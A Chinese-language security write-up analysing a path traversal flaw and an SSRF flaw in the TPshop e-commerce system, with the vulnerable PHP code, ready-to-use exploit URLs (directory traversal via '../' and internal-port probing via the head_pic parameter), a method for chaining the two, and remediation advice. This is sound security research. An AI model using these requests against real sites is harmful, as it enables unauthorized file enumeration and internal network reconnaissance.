TPshop 前台文件遍历与SSRF漏洞组合利用分析<\/h1>

0x01 漏洞概述<\/h2>

TPshop电商系统存在两个安全漏洞：<\/p>

前台文件遍历漏洞：允许未授权用户遍历服务器文件系统<\/li>

前台SSRF漏洞：可通过二维码生成功能发起服务器端请求伪造攻击<\/li> <\/ol>

这两个漏洞可以组合利用，实现更严重的攻击效果。<\/p>

0x02 漏洞分析<\/h2>

前台文件遍历漏洞<\/h3>

漏洞位置<\/strong>：\/application\/home\/controller\/Uploadify.php<\/code>中的fileList<\/code>方法<\/p>

漏洞代码分析<\/strong>：<\/p>

$type =<\/span> $_GET['type'<\/span>];
<\/span><\/span>$path =<\/span> $_COOKIE['user_id'<\/span>] .<\/span> '\/'<\/span> .<\/span> $_GET['path'<\/span>];
<\/span><\/span>$list =<\/span> $this-><\/span>getfiles<\/span>($path, $allowFiles, $key);
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

直接使用用户输入的path<\/code>参数拼接文件路径<\/li>
getfiles<\/code>方法未对路径进行任何过滤<\/li>
可通过..\/<\/code>实现目录穿越<\/li>
<\/ol>
利用方法<\/strong>：<\/p>
http:\/\/127.0.0.1\/index.php\/home\/Uploadify\/fileList?type=a&path=..\/..\/..\/application
<\/code><\/pre>
前台SSRF漏洞<\/h3>
漏洞位置<\/strong>：\/application\/home\/controller\/index.php<\/code>中的qr_code<\/code>方法<\/p>
漏洞代码分析<\/strong>：<\/p>
$head_pic =<\/span> $_GET['head_pic'<\/span>];
<\/span><\/span>if<\/span> (strpos<\/span>($head_pic, 'http'<\/span>) ===<\/span> 0<\/span>) {
<\/span><\/span>    $ch =<\/span> curl_init<\/span>();
<\/span><\/span>    curl_setopt<\/span>($ch,CURLOPT_URL<\/span>, $head_pic); 
<\/span><\/span>    $file_content =<\/span> curl_exec<\/span>($ch);
<\/span><\/span>    curl_close<\/span>($ch);
<\/span><\/span>    \/\/ 保存下载的文件
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

直接使用用户提供的URL发起CURL请求<\/li>
仅检查URL是否以"http"开头，无其他限制<\/li>
可用来探测内网服务<\/li>
<\/ol>
利用方法<\/strong>：<\/p>
http:\/\/127.0.0.1\/index.php\/home\/index\/qr_code?data=http:\/\/www.baidu.com&head_pic=http:\/\/127.0.0.1:2020
<\/code><\/pre>
组合利用<\/h3>

首先利用文件遍历漏洞查看\/upload\/qr_code<\/code>目录内容：<\/li>
<\/ol>
http:\/\/127.0.0.1\/index.php\/home\/Uploadify\/fileList?type=a&path=..\/..\/upload\/qr_code
<\/code><\/pre>

然后触发SSRF漏洞生成新文件：<\/li>
<\/ol>
http:\/\/127.0.0.1\/index.php\/home\/index\/qr_code?data=http:\/\/www.baidu.com&head_pic=http:\/\/127.0.0.1
<\/code><\/pre>

再次遍历目录查看新增文件，确认SSRF执行成功<\/li>
<\/ol>
限制<\/strong>：<\/p>

仅支持http\/https协议，无法使用其他协议如gopher、dict等<\/li>
需要配合文件遍历漏洞确认SSRF是否成功<\/li>
<\/ul>
0x03 漏洞修复建议<\/h2>


对于文件遍历漏洞：<\/p>

对用户输入的path<\/code>参数进行严格过滤<\/li>
禁止目录穿越字符..\/<\/code><\/li>
限制可访问的目录范围<\/li>
<\/ul>
<\/li>

对于SSRF漏洞：<\/p>

禁止使用用户提供的URL发起请求<\/li>
如需必要，应使用白名单机制限制可访问的域名\/IP<\/li>
禁用CURL的协议重定向功能<\/li>
<\/ul>
<\/li>

通用安全建议：<\/p>

实施最小权限原则<\/li>
对所有用户输入进行严格验证和过滤<\/li>
定期进行安全审计和代码审查<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 总结<\/h2>
TPshop电商系统的这两个漏洞可以组合利用，实现服务器文件系统遍历和内部网络探测。虽然SSRF漏洞存在一定限制（仅支持http\/https协议），但仍可能造成严重危害。建议用户及时更新到最新版本或按照上述建议进行修复。<\/p>